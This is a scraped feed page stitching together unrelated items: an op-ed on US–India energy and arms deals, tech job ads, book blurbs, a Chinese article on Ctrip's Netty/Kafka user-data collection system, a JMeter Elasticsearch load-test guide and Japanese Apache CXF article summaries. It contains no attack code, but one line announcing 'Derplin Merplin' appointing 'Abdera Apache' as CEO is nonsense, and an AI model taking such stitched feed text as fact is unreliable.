With the world's largest population, India presents a massive market for American goods of all kinds. President Trump, however, concentrated his remarks on energy and security. We are "looking forward to exporting more American energy to India as your economy grows, including major long-term contracts to purchase American natural gas." To the extent that imported gas replaces Indian coal, it will help New Delhi clean up the air pollution that makes its cities look as bad at those in China. VP Pence added nuclear power and clean coal to the list of energy sources the U.S. could help New Delhi develop. President Barack Obama had carried his "war on coal" overseas with a ban on any U.S. aid to the Indian coal industry. But India is not going to abandon its massive coal reserves; their use can, however, be improved.   

Modernizing India's military is central to the strategic alignment. VP Pence mentioned to the USIBC that "the United States will sell Sea Guardian UAVs, Apache attack helicopters, and C-17 transports to India." A larger program on the table is the sale of 126 fighter jets to India. The Lockheed F-16 "Viper" is the leading candidate, but the Saab JAS-39 "Gripen" is also in the running, though a strategic link to Sweden makes little sense in an Asian setting. India, however, is moving from being a consumer of military hardware to a producer, as any Great Power must do. Modi has a "make it in India" policy and Lockheed is willing to set up an F-16 production line there. The question is whether this will be considered "outsourcing" by the Trump administration. It should not be as long as the production is for Indian service and does not replace jobs in U.S. industry supplying the Pentagon. The F-16 is long out of production for the USAF. The new F-35 "Lightning II" is coming into service (also built by Lockheed).

Indian production should be seen as "market extension" which will create additional work for American factories and maintenance services, not only for this order of warplanes but for future orders of military equipment of many kinds as the strategic relationship deepens. It should be noted that the first European production line for the F-16 opened in 1978; so India is not asking for anything novel.

The need to offer "co-production" to win military contracts is a subject not often discussed in public debates over arms sales, but it is a part of many transactions. Offset arrangements can also involve local purchasing, subcontracting, investment, and technology-transfer requirements on U.S. exporters that benefit foreign firms in the purchasing country. The U.S. defense industry is the world's leader, but its comparative advantage does not yield the full returns economic textbooks promise because of real world practices like offsets. These are negotiated between foreign governments and corporations in virtually every deal. The state authorities have the greater leverage, as it is generally a buyer's market; but strategic considerations also play their part. Our officials must keep a close eye on such deals to keep a proper balance between risks and rewards to the U.S. defense industrial base.

India's offset requirements have been at the low end of the international scale. Caught between two allied nuclear powers, China and Pakistan, New Delhi needs to modernize its forces; but it also needs a domestic industrial infrastructure to support its armed services. This is why offsets, though generally banned in the commercial sector under the World Trade Organization, are allowed for national security reasons. What is truly important cannot be left to the "invisible hand"--- which means the hands of others.

President Trump and Prime Minister Modi are both nationalists in a dangerous world. As Modi put it, "I am sure that the convergence between my vision for a 'new India' and President Trump's vision for 'making America great again' will add new dimensions to our cooperation." Let us work to make it so in a positive way.

donate button pub dom ok


          Sr. Software Engineer - ARCOS LLC - Columbus, OH   
Oracle, PostgreSQL, C, C++, Java, J2EE, JBoss, HTML, JSP, JavaScript, Web services, SOAP, XML, ASP, JSP, PHP, MySQL, Linux, XSLT, AJAX, J2ME, J2SE, Apache,...
From ARCOS LLC - Tue, 13 Jun 2017 17:31:59 GMT - View all Columbus, OH jobs
          PHP Developer - TORRA INTERNATIONAL - Malappuram, Kerala   
Maintain and manage general network setup. Configure and maintain Apache and PHP Programming atmosphere.... ₹15,000 a month
From Indeed - Tue, 04 Apr 2017 03:57:40 GMT - View all Malappuram, Kerala jobs
          Mastering PHP 7   

Effective, readable, and robust codes in PHP About This Book Leverage the newest tools available in PHP 7 to build scalable applications Embrace serverless architecture and the reactive programming paradigm, which are the latest additions to the PHP ecosystem Explore dependency injection and implement design patterns to write elegant code Who This Book Is For This book is for intermediate level developers who want to become a master of PHP. Basic knowledge of PHP is required across areas such as basic syntax, types, variables, constants, expressions, operators, control structures, and functions. What You Will Learn Grasp the current state of PHP language and the PHP standards Effectively implement logging and error handling during development Build services through SOAP and REST and Apache Trift Get to know the benefits of serverless architecture Understand the basic principles of reactive programming to write asynchronous code Practically implement several important design patterns Write efficient code by executing dependency injection See the working of all magic methods Handle the command-line area tools and processes Control the development process with proper debugging and profiling In Detail PHP is a server-side scripting language that is widely used for web development. With this book, you will get a deep understanding of the advanced programming concepts in PHP and how to apply it practically The book starts by unveiling the new features of PHP 7 and walks you through several important standards set by PHP Framework Interop Group (PHP-FIG). You’ll see, in detail, the working of all magic methods, and the importance of effective PHP OOP concepts, which will enable you to write effective PHP code. You will find out how to implement design patterns and resolve dependencies to make your code base more elegant and readable. You will also build web services alongside microservices architecture, interact with databases, and work around third-party packages to enrich applications. This book delves into the details of PHP performance optimization. You will learn about serverless architecture and the reactive programming paradigm that found its way in the PHP ecosystem. The book also explores the best ways of testing your code, debugging, tracing, profiling, and deploying your PHP application. By the end of the book, you will be able to create readable, reliable, and robust applications in PHP to meet modern day requirements in the software industry. Style and approach This is a comprehensive, step-by-step practical guide to developing scalable applications using PHP 7.1 Downloading the example code for this book. You can download the example code files for all Packt books you have purchased from your account at http://www.PacktPub.com . If you purchased this book elsewhere, you can visit http://www.PacktPub.com/support and register to have the code file.


          JDK 9: Creating a Java Runtime Image With Maven   

At the moment, JDK 9 is only available as Early Access (EA) to let the community take a look how it works and what can be improved. Apart from all the news, for example about the modular system Jigsaw, there is one important question:

How can I create a Java runtime with Maven? But before we can begin, let's do a quick recap of runtime images.


          携程用户数据采集与分析系统   

【作者简介】王小波,携程技术中心框架研发部高级工程师,主要负责用户行为数据采集系统及相关数据产品研发设计工作。之前主要从事互联网广告、RTB相关系统研发和设计工作。本文来自王小波在“携程技术沙龙——移动开发工程实践与性能优化”上的分享。


携程用户数据采集与分析系统
一、携程实时用户数据采集系统设计实践

随着移动互联网的兴起,特别是近年来,智能手机、pad等移动设备凭借便捷、高效的特点风靡全球,同时各类APP的快速发展进一步降低了移动互联网的接入门槛,越来越多的网民开始从传统PC转移至移动终端上。但传统的基于PC网站和访问日志的用户数据采集系统已经无法满足实时分析用户行为、实时统计流量属性和基于位置服务(LBS)等方面的需求。

我们针对传统用户数据采集系统在实时性、吞吐量、终端覆盖率等方面的不足,分析了在移动互联网流量剧增的背景下,用户数据采集系统的需求,研究在多种访问终端和多种网络类型的场景下,用户数据实时、高效采集的方法,并在此基础上设计和实现实时、有序和健壮的用户数据采集系统。此系统基于Java NIO网络通信框架(Netty)和分布式消息队列(Kafka)存储框架实现,其具有实时性、高吞吐、通用性好等优点。

1、技术选型和设计方案:

一个典型的数据采集分析统计平台,对数据的处理,主要由如下五个步骤组成:


携程用户数据采集与分析系统

图1、数据平台处理流程

其中,数据采集步骤是最核心的问题,数据采集是否丰富、准确和实时,都直接影响整个数据分析平台的应用的效果。本论文关注的步骤主要在数据采集、数据传输和数据建模存储这三部分。

为满足数据采集服务实时、高效性、高吞吐量和安全性等方面的要求,同时能借鉴互联网大数据行业一些优秀开源的解决方案,所以整个系统都将基于Java技术栈进行设计和实现。整个数据采集分析平台系统架构如下图所示:


携程用户数据采集与分析系统

图2(数据采集分析平台系统架构)

其中整个平台系统主要包括以上五部分:客户端数据采集SDK以Http(s)/Tcp/Udp协议根据不同的网络环境按一定策略将数据发送到Mechanic(UBT-Collector)服务器。服务器对采集的数据进行一系列处理之后将数据异步写入Hermes(Kafka)分布式消息队列系统。为了关联业务服务端用户业务操作埋点、日志,业务服务器需要获取由客户端SDK统一生成的用户标识(C-GUID),然后业务服务器将用户业务操作埋点、日志信息以异步方式写入Hermes(Kafka)队列。最后数据消费分析平台,都从Hermes(Kafka)中消费采集数据,进行数据实时或者离线分析。其中Mechanic(UBT-Collector)系统还包括对采集数据和自身系统的监控,这些监控信息先写入Hbase集群,然后通过Dashboard界面进行实时监控。

(1)基于NIO的Netty网络框架方案

要满足前面提到的高吞吐、高并发和多协议支持等方面的要求。我们调研了几种开源异步IO网络服务组件(如Netty、MINI、xSocket),用它们和NginxWeb服务器进行了性能对比,决定采用Netty作为采集服务网络组件。下面对它进行一些概要介绍:Netty是一个高性能、异步事件驱动的NIO框架,它提供了对TCP、UDP和文件传输的支持,Netty的所有IO操作都是异步非阻塞的,通过Future-Listener机制,用户可以方便的主动获取或者通过通知机制获得IO操作结果。


携程用户数据采集与分析系统

图3(Netty框架内部组件逻辑结构)

Netty的优点有:

a、功能丰富,内置了多种数据编解码功能、支持多种网络协议。

b、高性能,通过与其它主流NIO网络框架对比,它的综合性能最佳。

c、可扩展性好,可通过它提供的ChannelHandler组件对网络通信方面进行灵活扩展。

d、易用性,API使用简单。

e、经过了许多商业应用的考验,在互联网、网络游戏、大数据、电信软件等众多行业得到成功商用。

Netty采用了典型的三层网络架构进行设计,逻辑架构图如下:


携程用户数据采集与分析系统

图4(Netty三层网络逻辑架构)

第一层:Reactor通信调度层。该层的主要职责就是监听网络的连接和读写操作,负责将网络层的数据读取到内存缓冲区中,然后触发各种网络事件,例如连接创建、连接激活、读事件、写事件等,将这些事件触发到Pipeline中,再由Pipeline充当的职责链来进行后续的处理。

第二层:职责链Pipeline层。负责事件在职责链中有序的向前(后)传播,同时负责动态的编排职责链。Pipeline可以选择监听和处理自己关心的事件。

第三层:业务逻辑处理层,一般可分为两类:a. 纯粹的业务逻辑处理,例如日志、订单处理。b. 应用层协议管理,例如HTTP(S)协议、FTP协议等。

我们都知道影响网络服务通信性能的主要因素有:网络I/O模型、线程(进程)调度模型和数据序列化方式。

在网络I/O模型方面,Netty采用基于非阻塞I/O的实现,底层依赖的是JDKNIO框架的Selector。

在线程调度模型方面,Netty采用Reactor线程模型。常用的Reactor线程模型有三种,分别是:

a、Reactor单线程模型:Reactor单线程模型,指的是所有的I/O操作都在同一个NIO线程上面完成。对于一些小容量应用场景,可以使用单线程模型。

b、Reactor多线程模型:Rector多线程模型与单线程模型最大的区别就是有一组NIO线程处理I/O操作。主要用于高并发、大业务量场景。

c、主从Reactor多线程模型:主从Reactor线程模型的特点是服务端用于接收客户端连接的不再是一个单独的NIO线程,而是一个独立的NIO线程池。利用主从NIO线程模型,可以解决一个服务端监听线程无法有效处理所有客户端连接的性能不足问题。Netty线程模型并非固定不变的,它可以支持三种Reactor线程模型。

在数据序列化方面,影响序列化性能的主要因素有:

a、序列化后的码流大小(网络带宽占用)。

b、序列化和反序列化操作的性能(CPU资源占用)。

c、并发调用时的性能表现:稳定性、线性增长等。

Netty默认提供了对GoogleProtobuf二进制序列化框架的支持,但通过扩展Netty的编解码接口,可以实现其它的高性能序列化框架,例如Avro、Thrift的压缩二进制编解码框架。

通过对Netty网络框架的分析研究以及对比测试(见后面的可行性分析测试报告)可判断,基于Netty的数据采集方案能解决高数据吞吐量和数据实时收集的难点。

(2)客户端数据加解密和压缩方案

对一些明感的采集数据,需要在数据传输过程中进行加密处理。目前存在的问题是,客户端采集代码比较容易被匿名用户获取并反编译(例如Android、javascript),导致数据加密的算法和密钥被用户窃取,较难保证数据的安全性。根据加密结果是否可以被解密,算法可以分为可逆加密和不可逆加密(单向加密)。具体的分类结构如下:


携程用户数据采集与分析系统

图5(加密算法分类)

密钥:对于可逆加密,密钥是加密解算法中的一个参数,对称加密对应的加解密密钥是相同的;非对称加密对应的密钥分为公钥和私钥,公钥用于加密,私钥用于解密。私钥是不公开不传送的,仅仅由通信双方持有保留;而公钥是可以公开传送的。非对称密钥还提供一种功能,即数字签名。通过私钥进行签名,公钥进行认证,达到身份认证的目的。

根据数据采集客户端的特点,对于采集数据使用对称加密算法是很明智的选择,关键是要保证对称密钥的安全性。目前考虑的方案主要有:

a、将加解密密钥放入APP中某些编译好的so文件中,如果是JavaScript采集的话,构造一个用C编写的算法用于生成密钥,然后借助Emscripten把C代码转化为JavaScript代码,这种方案有较好的混淆作用,让窃听者不太容易获取到对称密钥。

b、将密钥保存到服务器端,每次发送数据前,通过HTTPS的方式获取加密密钥,然后对采集数据进行加密和发送。

c、客户端和服务器端保存一份公钥,客户端生成一个对称密钥K(具有随机性和时效性),使用公钥加密客户端通信认证内容(UID+K),并发送到服务器端,服务端收到通信认证请求,使用私钥进行解密,获取到UID和对称密钥K,后面每次采集的数据都用客户端内存中的K进行加密,服务器端根据UID找到对应的对称密钥K,进行数据解密。

这三种客户端数据加密方式基本能解决客户端采集数据传输的安全性难题。

采集数据压缩。为了节省流量和带宽,高效发送客户端采集的数据,需要使用快速且高压缩比的压缩算法,目前考虑使用标准的GZIP和定制的LZ77算法。

(3)基于携程分布式消息中间件Hermes的数据存储方案

Hermes是基于开源的消息中间件Kafka且由携程自主设计研发。整体架构如图:


携程用户数据采集与分析系统

图6(Hermes消息队列整体架构)

Hermes消息队列存储有三种类型:

a、mysql适用于消息量中等及以下,对消息治理有较高要求的场景。

b、Kafka适用于消息量大的场景。

c、Broker分布式文件存储(扩展Kafka、定制存储功能)。

由于数据采集服务的消息量非常大,所以采集数据需要存储到Kafka中。Kafka是一种分布式的,基于发布/订阅的消息系统。它能满足采集服务高吞吐量、高并发和实时数据分析的要求。它有如下优秀的特性:

a、以时间复杂度为O(1)的方式提供消息持久化能力,即使对TB级以上数据也能保证常数时间复杂度的访问性能。

b、高吞吐率。即使在非常廉价的商用机器上也能做到单机支持每秒100K条以上消息的传输。

c、支持Kafka Server间的消息分区,及分布式消费,同时保证每个Partition内的消息顺序传输。

d、同时支持离线数据处理和实时数据处理。

e、Scale out,即支持在线水平扩展。

一个典型的Kafka集群中包含若干Producer(可以是Web前端产生的采集数据,或者是服务器日志,系统CPU、Memory等),若干broker(Kafka支持水平扩展,一般broker数量越多,集群吞吐率越高),若干ConsumerGroup,以及一Zookeeper集群。Kafka通过Zookeeper管理集群配置,选举leader,以及在Consumer Group发生变化时进行rebalance。Producer使用push模式将消息发布到broker,Consumer使用pull模式从broker订阅并消费消息。Kafka拓扑结构图如下:


携程用户数据采集与分析系统

图7(Kafka拓扑结构)

我们知道,客户端用户数据的有序性采集和存储对后面的数据消费和分析非常的重要,但是在一个分布式环境下,要保证消息的有序性是非常困难的,而Kafka消息队列虽然不能保证消息的全局有序性,但能保证每一个Partition内的消息是有序的。在用户数据采集和分析的系统中,我们主要关注的是同一个用户的数据是否能保证有序,如果我们在数据采集服务端能将同一个用户的数据存储到Kafka的同一个Partition中,那么就能保证同一个用户的数据是有序的,因此基本上能解决采集数据的有序性。

(4)基于Avro格式的数据灾备存储方案

当出现网络严重中断或者Hermes(Kafka)消息队列故障情况下,用户数据需要进行灾备存储,目前考虑的方案是基于Avro格式的本地文件存储。其中Avro是一个数据序列化反序列化框架,它可以将数据结构或对象转化成便于存储或传输的格式,Avro设计之初就用来支持数据密集型应用,适合于远程或本地大规模数据的存储和交换。

Avro定义了一个简单的对象容器文件格式。一个文件对应一个模式,所有存储在文件中的对象都是根据模式写入的。对象按照块进行存储,在块之间采用了同步记号,块可以采用压缩的方式存储。一个文件由两部分组成:文件头和一个或者多个文件数据块。其存储结构如下图所示:


携程用户数据采集与分析系统

图8(Avro对象容器文件格式)

灾备存储处理过程是:当网络异常或者Hermes(Kafka)消息队列出现故障时,将采集的用户数据解析并转化成Avro格式后,直接序列化存储到本地磁盘文件中,数据按Kafka-Topic分成多个文件存储,且每小时自动生成一个新的文件。当网络或者Hermes(Kafka)故障恢复后,后端线程自动读取磁盘Avro文件,将数据写入Hermes(Kafka)消息队列的对应Topic和分区中。每个文件写入成功后,自动删除灾备存储文件。这样能增加用户数据采集服务的健壮性和增强服务容错性。

2、架构设计方案可行性分析

在相同配置的测试服务器上(包括数据采集服务器、Hermes(Kafka)集群)做如下对比实验测试:(使用ApacheBenchmark进行Web性能压力测试工具)

(1)Netty VS Nginx处理网络请求对比

在不对采集数据进行业务处理的情况下(即只接请求并做响应,不做业务处理,也不存储采集数据),在5000并发,Keepalive模式下均能达到每秒处理4万多请求,其中Nginx的CPU、内存消耗会小一些。测试对比数据如下:(ab参数: -k –n 10000000 –c 5000)


携程用户数据采集与分析系统

(2)Netty对采集数据进行业务处理

Netty服务加上采集数据解析相关业务处理,以及处理后的数据写入Hermes(Kafka)消息队列。可以进行简单的间接估算。如果采集服务要求达到:每秒处理3万左右请求,99%的请求完成时间小于800ms的目标,则采集数据解析和存储流程的处理时间必须在600ms以内。而这两步又分为数据解析和数据存储,可以分别进行压力测试加以验证。根据我们的压力测试,采集数据解析和存储也能完全满足性能要求。

经以上对比实验测试表明,使用Netty服务组件收集、解析数据并直接写入Hermes(Kafka)分布式消息队列的方案初步具备可行性。

二、相关数据分析产品介绍

基于实时采集到的用户数据和系统监控数据,我们开发了一套相关的数据分析产品。产品的内容主要分以下几部分:(1)、API和页面性能报表;(2)、页面访问和流量;(3)、用户行为分析;(4)、系统异常崩溃分析;(5)、数据实时查询工具;(6)、采集数据排障工具;(7)、其它。其中详细分类如下图所示:


携程用户数据采集与分析系统

图9(数据分析产品分类)

现选取其中几个比较常见的产品做下简单介绍:

1、单用户浏览跟踪

作用:实时跟踪用户浏览记录,帮助产品优化页面访问流程、帮助用户排障定位问题。

使用案例:根据用户在客户端上的唯一标识ID,如:手机号、Email、注册用户名、ClientId、VisitorId等查询此用户在某一时间段顺序浏览过的页面和每个页面的访问时间及页面停留时长等信息。如果用户在浏览页面过程中发生了异常崩溃退出情况,可以结合应用崩溃信息关联查询到相关信息。

2、页面转化率

作用:实时查看各个页面的访问量和转化情况,帮助分析页面用户体验以及页面布局问题。

使用案例:用户首先配置页面浏览路径,如p1023-> p1201 -> p1137 -> p1300,然后根据用户配置页面浏览路径查询某个时间段各个页面的转化率情况。如有1.4万用户进入p1023页面,下一步有1400用户进入下一页面p1201。这样可推算出页面p1201的转化率为10%左右。这是最简单的一种页面转化率,还有间接的页面转化率,即只匹配第一个和最后一个页面的访问量。同时可以按各种维度进行条件筛选,比如:网络、运营商、国家、地区、城市、设备、操作系统等等。

3、用户访问流

作用:了解每个页面的相对用户量、各个页面间的相对流量和退出率、了解各维度下页面的相对流量。

使用案例:用户选择查询维度和时间段进行查询,就能获取到应用从第一个页面到第N个页面的访问路径中,每个页面的访问量和独立用户会话数、每个页面的用户流向、每个页面的用户流失量等信息。

4、点击热力图

作用:发现用户经常点击的模块或者区域,判断用户喜好、分析页面中哪些区域或者模块有较高的有效点击数、应用于A/B测试,比较不同页面的点击分布情况、帮助改进页面交互和用户体验。

使用案例:点击热力图查看工具包括Web和APP端,统计的指标包括:原始点击数(当前选中元素的原始点击总数)、页面浏览点击数(当前选中元素的有效点击数,同一次页面浏览,多次点击累计算1次点击)、独立访客点击数(当前选中元素的有效点击数,同一用户,多次点击累计算1次点击)。

5、采集数据验证测试

作用:快速测试是否能正常采集数据、数据量是否正常、采集的数据是否满足需求等。

使用案例:用户使用携程APP扫描工具页面的二维码,获取用户标识信息,之后正常使用携程APP过程中,能实时地将采集到的数据分类展示在工具页面中,对数据进行对比测试验证。

6、系统性能报表

作用:监控系统各业务服务调用性能(如SOA服务、RPC调用等)、页面加载性能、APP启动时间、LBS定位服务、Native-Crash占比、JavaScript错误占比等。按小时统计各服务调用耗时、成功率、调用次数等报表信息。

基于前端多平台(包括iOS、Android、Web、Hybrid、RN、小程序)数据采集SDK的丰富的自动化埋点数据,我们可以对数据、用户、系统三方面进行多维度立体的分析。服务于系统产品和用户体验、用户留存、转换率及吸引新用户。

转载请注明来自36大数据(36dsj.com):36大数据 携程用户数据采集与分析系统


          US tests Apache helicopters with mounted laser beams   
An Apache helicopter has successfully acquired and hit an unmanned target with a laser gun for the first time in history. Mounted on an Apache AH-64 attack helicopter, the high energy laser tracked and directed energy on the stationary target which was a little less than a mile away. The achievement proves that laser weapons are...
          Python Full-Stack Web Developer DevOps Software Engineer Agile Trading / Joseph Harry Ltd / New York, NY   
Joseph Harry Ltd/New York, NY

Python Full-Stack Web Developer (Software Engineer Python Apache Tom Cat IIS DevOps ChatOps Microservices Micro Services CI CD Bamboo BitBucket DDD ClojureScript Docker Chef Jenkins Agile Digital Trading Banking) required by our trading software client in New York City, New York.

You MUST have the following:

Good experience as a full-stack Software Engineer/Developer for Python web applications

HTML 5, CSS 3, JavaScript for Front End development

Web Servers such as Tom Cat or Apache

Agile

The following would be DESIRABLE, not essential:

BitBucket

Microservices or Domain Driven Design (DDD)

ClojureScript

Docker

ChatOps

Contribution to the open-source community- GitHub, Stack Overflow

Continuous integration (Bamboo/Hudson, TeamCity, TFS, MSBuild)

Automated deployment (Chef, Ansible, Octopus)

Configuration management (Puppet, PowerShell DSC)

Role: Python Full-Stack Web Developer/Software Engineer required by my trading software client in New York City, New York. You will join a small Agile team of five developers, spread over the US and Europe, that are extending and improving credit and counterparty risk applications. There will be the continuous development of new features in order to incorporate the constant release of financial regulation into the product suite. This is a micro service application. The suite is web based, built in Python and running on Apache, Tom Cat and MySQL.

In order to incorporate new financial regulation, the team adopts a highly Agile DevOps environment. This results in several releases a day with the use of Bamboo, BitBucket and Confluence for continuous integration, deployment and source control.

The environment is modern and progressive. There will be excellent opportunities to progress in to Lead Developer and Architect roles.

Salary: $100k - £125k + 20% Bonus + Benefits

Employment Type: Permanent
Work Hours: Full Time
Other Pay Info: $100k - $125k + 20% Bonus + 401K

Apply To Job
          Full-Stack Web Developer DevOps Software Engineer Python Agile Trading / Joseph Harry Ltd / New York, NY   
Joseph Harry Ltd/New York, NY

Full-Stack Web Developer (Software Engineer Python Apache Tom Cat IIS DevOps ChatOps Microservices CI CD Bamboo BitBucket ClojureScript Docker Chef Jenkins Agile Digital Trading Banking) required by our trading software client in New York City, New York.

You MUST have the following:

Good experience as a full-stack Software Engineer/Developer for web applications; this can be any language including .NET, Java, PHP, C++, Python

HTML 5, CSS 3, JavaScript for Front End development

An interest in learning Python

Web Servers such as IIS, Tom Cat or Apache

Agile

The following would be DESIRABLE, not essential:

BitBucket

Microservices or Domain Driven Design (DDD)

ClojureScript

Docker

ChatOps

Contribution to the open-source community- GitHub, Stack Overflow

Continuous integration (Bamboo/Hudson, TeamCity, TFS, MSBuild)

Automated deployment (Chef, Ansible, Octopus)

Configuration management (Puppet, PowerShell DSC)

Role:

Full-Stack Web Developer/Software Engineer required by my trading software client in New York City, New York. You will join a small Agile team of five developers, spread over the US and Europe, that are extending and improving credit and counterparty risk applications. There will be the continuous development of new features in order to incorporate the constant release of financial regulation into the product suite. The suite is web based, built in Python and running on Apache, Tom Cat and MySQL. Although this role will be exclusively developing in Python, Python experience is not required. You can have experience in .NET, Java, PHP, C++ or other languages as long as you are happy to work with Python and have web development experience.

In order to incorporate new financial regulation, the team adopts a highly Agile DevOps environment. This results in several releases a day with the use of Bamboo, BitBucket and Confluence for continuous integration, deployment and source control.

The environment is modern and progressive. There will be excellent opportunities to progress in to Lead Developer and Architect roles.

Salary: $100k - £125k + Bonus + Benefits

Employment Type: Permanent
Work Hours: Full Time
Other Pay Info: $100k - $125k + Bonus + 401K

Apply To Job
          Derplin Merplin has resigned from the position of CEO with The Apache Foundation. As their last move they appointed Abdera Apache as CEO   
Derplin Merplin has resigned from the position of CEO with The Apache Foundation. As their last move they appointed Abdera Apache as CEO
          SSL (https) on WAMP   
繼前篇「WAMP 架設網頁伺服器」後,這篇文章要來寫如何在WAMP安裝SSL的服務。程式開發人員會遇到一些像是金流部分的部分,這時候就不得不考慮SSL模式的測試。具體的作法就是在自己的主機建立CA認證伺服,由自己主機來當憑證中心。烘培參考下列幾篇文章 在WAMP上啟用SSL Module Enabling SSL on WAMP Enable HTTPS on WAMP2 從別人的文章來看,清楚的表示建立SSL的過程,可以分為「製作SSL憑證與公開金鑰」與「編輯 Apache SSL 設定檔」兩部分
          Anglomania Apache Blouse - Bronze   
Anglomania Apache Blouse - Bronze

Anglomania Apache Blouse - Bronze


          Thread: Thunderbolt Apache Leader:: Rules:: RQ-1, put this down and all pilots are Fast? Seems a bit OP an I doing this right?   

by Icedanno

The RQ-1 drone, rules say, "If the RQ-1 is at High Altitude, treat all our Pilots as being Fast."

That seems a bit... Overpowered. It's only 3 points!

Is this right?
          Elasticsearch压力测试工具-Apache Jmeter   

一、下载Jmeter

下载地址:http://jmeter.apache.org/download_jmeter.cgi

解压之后运行:

/apache-jmeter-3.2/bin
./jmeter

二、添加线程组

依次店测试计划->添加->threads->线程组:

这里写图片描述

在线程组中添加线程数和用户数,模拟用户访问:
这里写图片描述
10个用户,每个用户200个线程,循环10次。

三、添加请求

在线程组下,依次添加->Sampler->HTTP请求:

这里写图片描述

http请求中指定ES店地址、端口、查询命令:

这里写图片描述

四、添加报告

依次店添加->监听器->Summary Report:

这里写图片描述

之后点击保存,生成一个.jmx文件。

五、测试

运行,在summary report中查看结果:
这里写图片描述

作者:napoay 发表于2017/6/30 20:47:44 原文链接
阅读:163 评论:0 查看评论

          Web サービスを開発する: 第 3 回 Apache CXF を使用してファイル・アップロード Web サービスを開発する   
このチュートリアルでは、ユーザーから送信されたファイルをアップロードして、特定のディレクトリーに保管する CXF Web サービスを開発する方法を実演します。サンプル・アプリケーションは、広く使用されている Eclipse IDE で開発します。
          Apache HttpClient による Android クライアントを JAX-RS Web サービスに展開する   
Apache HttpClient ライブラリーを使用して JAX-RS Web サービスにアクセスしてみましょう。RESTful な Web サービスを作成するには、JAX-RS のリファレンス実装である Jersey を使用すると、 Java 環境で簡単に作成することができます。Android は人気のスマートフォンです。この記事では、Android による JAX-RS クライアントを作成します。具体的には、Apache HttpClient ライブラリーを使用して、JAX-RS Web サービスにアクセスするためのクライアントを作成します。
          Apache HttpClient による Android クライアントを JAX-RS Web サービスに展開する   
none
          Apache CXF を使用して Web サービス・メッセージのロギングを実行する   
アプリケーションの監視やデバッグのツールとしてロギングを使用することができます。この記事では Apache CXF を使用して Web サービス・メッセージのロギングを実行する方法について学びます。この記事で説明するのは、メッセージ・ロギングを実装するさまざまな方法、インターセプターやフィーチャーなど、CXF の重要機能を使用してメッセージ・ロギングを実行する方法、Spring ベースの Bean 構成を使用してメッセージ・ロギングを実行する方法についても説明します。
          Apache CXF と Aegis を使用した Web サービスの開発   
Aegis は、Apache CXF Web サービス・フレームワークが標準でサポートしているデータ・バインディング・ツールの 1 つです。データ・バインディングは Java オブジェクトと XML 文書とをマッピングする機能です。この記事では、Aegis を使用して CXF ベースの Web サービスを作成する方法と、その Web サービスのデータ・バインディング要求をカスタマイズする方法について説明します。また、Aegis を使用するメリットについて、さらには Aegis の外部マッピング・ファイルを使用してバインディングをカスタマイズする方法について、特に重点的に説明します。
          Java Web サービス: WS-Policy について理解する   
WS-Policy は、Web サービスに適用する機能とオプションを構成するための汎用構造を提供します。皆さんは、この連載の WS-Security 構成で使用されている例の他、WS-ReliableMessaging などの他の拡張技術でも WS-Policy を目にしたことがあるでしょう。今回の記事では、WS-Policy 文書の構造、そして WSDL (Web Service Description Language) でポリシーをサービスに関連付ける方法を説明し、サンプルのセキュリティー構成を Apache Axis2、Metro、Apache CXF のそれぞれで試します。
          Java Web サービス: WS-SecureConversation のパフォーマンス   
WS-SecureConversation によって、進行中の Web サービス・メッセージ交換を単純な WS-Security よりも少ない処理オーバーヘッドでセキュアにすることができます。この記事では、Apache Axis2、Metro、Apache CXF という代表的な 3 つのオープンソースの Java Web サービス・スタックで WS-SecureConversation を構成して使用する方法を説明します。さらに、この 3 つのスタックで WS-SecureConversation を使用した場合のパフォーマンスの違いを調べます。
          Java Web サービス: CXF のパフォーマンス比較   
Apache CXF のベースとなっているコンポーネントは Apache Axis2 および Metro とある程度共通していますが、CXF はこの 2 つとは全く異なるアーキテクチャーでコンポーネントを構成しています。Dennis Sosnoski の連載「Java Web サービス」では今回、CXF、Metro、そして Axis2 の各スタックのパフォーマンスを WS-Security を使用した場合と使用しない場合の両方で比較します。
          Jackson JSON プロセッサーと Apache Wink を組み合わせて使う   
Apache Wink は急速に JAX-RS 1.0 仕様のデファクト実装の 1 つになりつつあります。JSON へのマーシャリング/JSON からのアンマーシャリング用として、標準的な Apache Wink ディストリビューションには JSON.org や Jettison などのプロバイダーが含まれていますが、これらのプロバイダーは配列の表現に少し問題があると同時に、戻り型が制限されています。そのため、JAX-RS サービスのコーディングや、JAX-RS サービスのクライアントとしての Ajax (Asynchronous JavaScript and XML) アプリケーションのコーディングは簡単ではありません。この記事では、JSON プロバイダーとして Jackson を使うように既存の Apache Wink 対応 Web アプリケーションを構成し、いくつかの問題を解決する方法について学びます。一例として Jackson 対応の簡単な JAX-RS Web サービスのサンプル・コードを使用し、Jackson プロバイダーの長所について説明します。
          Java Web サービス: CXF での WS-Security   
Apache CXF Web サービス・スタックでは、WS-SecurityPolicy を使用したセキュリティー処理の構成を含め、WS-Security をサポートしています。CXF では、セキュリティー処理を実装するために実行時に使用されるデプロイメント・パラメーターを柔軟に構成することができ、クライアント・サイドでは静的構成オプションと動的構成オプションの両方がサポートされます。連載「Java Web サービス」の今回の記事では、著者の Dennis Sosnoski が単純な UsernameToken WS-Security の場合、そして署名および暗号化を使用する場合を例に、CXF の使い方を説明します。
          Java Web サービス: CXF の紹介   
Apache CXF Web サービス・スタックは、JAXB 2.x データ・バインディング (およびそれに代わるその他のデータ・バインディング) および JAX-WS 2.x サービス構成をサポートしています。以前の記事で紹介した JAXB/JAX-WS と同様に、CXF では XML ファイルを使用して JAX-WS の構成情報を拡張します。この記事では、連載「Java Web サービス」の著者である Dennis Sosnoski が、CXF を使ってクライアントおよびサーバーの開発を行う際の基本事項を説明します。
          Spring フレームワークを利用して行う SCA コンポーネントの設計と開発: 第 1 回 Spring、SCA、そして Apache Tuscany の 3 点セット   
この「Spring フレームワークを利用して行う SCA コンポーネントの設計と開発」シリーズでは、SCA (Service Component Architecture) と Spring フレームワークとを効果的に組み合わせ、分散サービス・アプリケーションを作成する方法を学びます。第 1 回の今回は、SCA とSpring とを組み合わせるメリットについて概説します。Spring フレームワークを使って SCA コンポーネントを設計、作成する方法、Spring Bean を SCA サービスとして公開する方法、そして Spring アプリケーションの中で SCA のサービスとプロパティーにアクセスする方法を学びましょう。この記事で紹介する例では、Apache Tuscany SCA Java 技術ランタイムを使用します。
          Got Logs? Get a PaperTrail: First thoughts   
